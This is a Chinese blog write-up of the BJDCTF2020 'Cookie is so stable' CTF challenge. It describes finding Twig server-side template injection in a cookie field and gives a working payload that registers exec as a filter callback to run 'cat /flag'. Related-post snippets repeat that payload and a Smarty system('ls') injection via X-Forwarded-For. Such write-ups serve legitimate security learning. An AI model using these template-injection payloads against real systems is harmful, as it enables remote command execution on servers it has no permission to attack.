[BJDCTF2020]Cookie is so stable1

于 2024-08-04 11:54:55 发布
阅读量224 收藏
点赞数 2
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140903920
版权

打开题目

查看页面源码

点击hint查看源码

提示看cookie,burp抓包查看cookie

试一下

尝试{{7*7}},发现ssti漏洞,判断是twig

抓包,发现user为注入点

输入payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

得到flag

flag{aa6a537d-b0e1-401e-a363-4304e4c1cdd1}

worker..
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 506
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1360
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
[CTF][BJDCTF2020]Cookie is so stable 1(SSTI)
Gh0st_1n_The_Shell的博客
08-16 253
从hint.php可以找到提示,要求观察cookies 打开flag.php可以看到需要输入用户名,多次试验后发现输入的用户名会以cookies的方式储存 使用dirsearch扫描没有发现什么有用的信息,一开始以为是cookies注入,但是没有找到sql注入点 猜测用户名的回显含有ssti漏洞,于是尝试输入 {7+7} 但是发现+变成了空格,于是改为了{7*7}也没有什么反应,后面才知道要两个大括号{{7*7}} 才行 经检验发现是Twig 上网搜索Twig的payload但是套用不了,后面看别人的
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 346
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3506
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2762
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
Chrome导出cookie的实战教程
热门推荐
weixin_43178406的博客
06-29 5万+
本文主要介绍了Chrome导出cookie的实战教程,希望能对使用Chrome的同学们有所帮助。 文章目录 1. 问题描述 2. 实战工具一 3. 实战工具二
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1776
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
[BJDCTF2020]Cookie is so stable -wp
freerats的博客
08-02 285
经过测试,可以发现有ssti 在源码出发现提示,说关注cookie 登入后抓包 发现user处就是注入点 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 可以利用已知payload进行命令执行,获得flag。 漏洞利用请参考https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%..
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3298
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
[BJDCTF2020]Cookie is so stable1--writeup
m0_65080524的博客
08-15 84
开始扫目录 没有发现其他线索 ,于是尝试ssti注入根据上图进行尝试,发现不是49 所以是失败了 --------因此尝试{{7*7}}输入{{7*‘7’}},返回49表示是模块输入{{7*‘7’}},返回7777777表示是模块开始尝试注入可以推动该处可能不是注入点,而题目有提示是在cookie于是用bp抓包看看user看起来就很像注入点试试看因为确定是Twig注入,所以是有固定的。
BUUCTF [BJDCTF2020]Cookie is so stable
Chu_Jian_Xiong的博客
10-10 221
[BJDCTF2020]Cookie is so stable模板注入Payload获取flag 模板注入 打开题目 直奔主题吧 发现回显和输入是一样的,猜想是模板注入 这里引入个模板注入流程图 经过测试可以发现该模板应该是Twig,直接去拿对应的Payload Payload {{_self.env.registerUndefinedFilterCallback("exec")}{{_self.env.getFilter("id")}} 获取flag 用burp做 查看根目录发现只给一个条
cookie is nil
最新发布
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一个空的 `cookie` 对象的属性或方法时,由于没有有效的内容,程序会抛出错误,因为nil代表没有可用的数据。 例如,在JavaScript中: ```javascript let cookie; // cookie 初始化为空 console.log(cookie.value); // 如果cookie还没有赋值,这将会报错,因为cookie is nil // 解决方案:确保先给cookie赋值再操作 cookie = getCookie(); // 获取cookie的值 if (cookie) { console.log(cookie.value); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值